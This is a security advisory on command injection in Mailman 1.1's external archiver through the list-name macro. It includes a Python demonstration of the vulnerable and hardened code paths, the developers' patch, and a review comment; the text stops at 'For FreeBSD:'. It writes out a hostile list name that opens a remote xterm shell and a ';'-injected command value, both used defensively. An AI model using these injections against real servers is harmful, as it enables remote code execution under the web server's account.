
Mailman: execute arbitrary code



    Mailman 1.1 and prior with external archiving enabled


    Christopher P. Lindsey found the following.  Mailman from
    is a mailing list manager with strong Web functionality.  If a
    site is running Mailman 1.1 with an external archiving mechanism
    that uses the internal variable %(listname)s, list administrators
    can run any command with the Web server's uid/gid.

    This bug was reported to the developers in late November 1999
    and was fixed in the CVS source tree.  Newer beta versions of
    Mailman are not susceptible, yet it has recently come to light
    that the vulnerable 1.1 package is still available as a stable,
    non-beta release on the Mailman site(s).

    Mailman has a mechanism that allows messages sent to a mailing
    list to be piped into an external program.  Traditionally this is
    a Web-based archiver such as MHonArc or hypermail.  To make the
    archiver command line more flexible, it may contain macros that
    expand to internal Mailman values.  For example, list archives can
    be saved on a per-list basis with this line in $prefix/Mailman/

        PUBLIC_EXTERNAL_ARCHIVER  = '(mhonarc -add -nolock -umask 023 -rcfile rc.%(listname)s -outdir /mnt/WWW/htdocs/lists/%(listname)s)'

    The problem comes from the %(listname)s expansion.  Since it is
    derived from a value that the list administrator can set on a
    per-list basis, it is subject to tampering.  Consider a list
    whose name was changed to

        /usr/X11R6/bin/xterm -display -e /bin/csh

    by a list administrator.  As soon as a message is sent to the list,
    this command is executed, opening a remote xterm with a shell
    running under the Web server's uid/gid.  Any command available to
    the Web server can be executed in this fashion.
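    The following is an added illustration, not Mailman's code (Mailman
    1.1 was Python 1.5; this is Python 3).  It reproduces the mechanism
    described above with a constructed archiver template in which "echo"
    stands in for mhonarc, so it runs anywhere with /bin/sh, and places
    a hardened expansion beside it.  The hostile list name uses ";" to
    append commands rather than replacing the whole program, a variant
    of the page's xterm example that is assumed here.  The template,
    list names, allow-list regex and helper names are all assumptions.

```python
import re
import shlex
import subprocess

# Constructed stand-in for the PUBLIC_EXTERNAL_ARCHIVER line in mm_cfg.py.
# "echo" replaces mhonarc so the demo runs anywhere; the macro appears twice,
# as in the advisory's example line (-rcfile ... and -outdir ...).
ARCHIVER_TEMPLATE = "echo archiving %(listname)s into /tmp/lists/%(listname)s"

# Constructed hostile list name: once the expanded string reaches a shell,
# ";" ends the archiver command and "echo INJECTED" runs as the Web server.
HOSTILE_NAME = "; echo INJECTED; :"


def expand_vulnerable(template, listname):
    """Mailman 1.1 style: %-substitute the list name straight into one
    command string, with no quoting and no character restrictions."""
    return template % {"listname": listname}


def run_vulnerable(template, listname):
    """Hand the expanded string to /bin/sh (what the 1.1 code path amounted
    to) and return the shell's stdout."""
    cmd = expand_vulnerable(template, listname)
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


# Hardened variant: two independent fixes, layered.
# 1. Allow-list the list name (letters, digits, '_', '.', '-'): nothing a
#    shell, a path or an rcfile name cares about can get in.
LISTNAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_.-]{0,63}$")


def is_safe_listname(listname):
    return bool(LISTNAME_RE.match(listname))


# 2. Never give the expanded string to a shell.  Split the template into
#    argv words first, then substitute into each word: whatever the list
#    name contains, it stays inside one argument.
def build_argv(template, listname):
    return [word % {"listname": listname} for word in shlex.split(template)]


def run_hardened(template, listname):
    """Reject names outside the allow-list, then exec without a shell."""
    if not is_safe_listname(listname):
        raise ValueError("refusing list name %r" % listname)
    argv = build_argv(template, listname)
    return subprocess.run(argv, shell=False, capture_output=True, text=True).stdout


if __name__ == "__main__":
    # Vulnerable path: "INJECTED" shows up because the shell ran our command.
    print(run_vulnerable(ARCHIVER_TEMPLATE, HOSTILE_NAME), end="")
    # Hardened path: the hostile name is one argv element, and is rejected anyway.
    print(build_argv(ARCHIVER_TEMPLATE, HOSTILE_NAME))
    try:
        run_hardened(ARCHIVER_TEMPLATE, HOSTILE_NAME)
    except ValueError as err:
        print("hardened:", err)
    print(run_hardened(ARCHIVER_TEMPLATE, "announce"), end="")
```

    The allow-list alone would have stopped the xterm example, since
    "/" and spaces are rejected; the argv split alone would have
    stopped the ";" variant, since the shell never sees the name.
    Doing both means a future macro such as a path or rcfile name is
    also constrained, which the case-only patch below does not attempt.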

    Other variable names can be accessed if your
    PUBLIC_EXTERNAL_ARCHIVER definition is configured to use them.
    The patch below will only fix problems with %(listname)s


    Upgrade to  a later  version of  Mailman, or  install the supplied

    This patch was provided by the Mailman developers and later
    cleaned up to work against a stock 1.1 distribution.  It works by
    only allowing list owners to change the letter case of their list's
    name.  Obviously a better long-term solution that sanitizes values
    before they reach system calls, etc. should be considered.

    ***        Mon Mar 13 21:03:53 2000
    ---    Mon Mar 13 21:04:51 2000
    *** 784,789 ****
    --- 784,800 ----
                      val = cgi_info[property].value
                  value = GetValidValue(lst, property, kind, val, deps)
                  if getattr(lst, property) != value:
    +                 # TBD: Ensure that lst.real_name differs only in letter
    +                 # case.  Otherwise a security hole can potentially be opened
    +                 # when using an external archiver.  This seems ad-hoc and
    +                 # could use a more general security policy.
    +                 if property == 'real_name' and \
    +                    string.lower(value) <> string.lower(lst._internal_name):
    +                     # then don't install this value.
    +                     document.AddItem("""<p><b>real_name</b> attribute not
    +                     changed!  It must differ from the list's name by case
    +                     only.<p>""")
    +                     continue
                      setattr(lst, property, value)
                      dirty = 1
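    Review bot: the guard is placed in the admin form handler and only covers the
    `real_name` property, so it stops the archiver hole for `%(listname)s` alone and
    only when the change arrives through this loop; the advisory itself notes that
    any other key expanded into PUBLIC_EXTERNAL_ARCHIVER stays unchecked. The
    check belongs where the archiver command string is built and executed,
    validating or quoting each substituted value (or avoiding the shell
    altogether), rather than on one form field. The `continue` is right, since
    it skips both `setattr` and `dirty = 1` for the rejected value, but the
    rejection is only reported via `document.AddItem(...)` and is not logged,
    which would be useful when a list owner is probing this.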

    For FreeBSD:
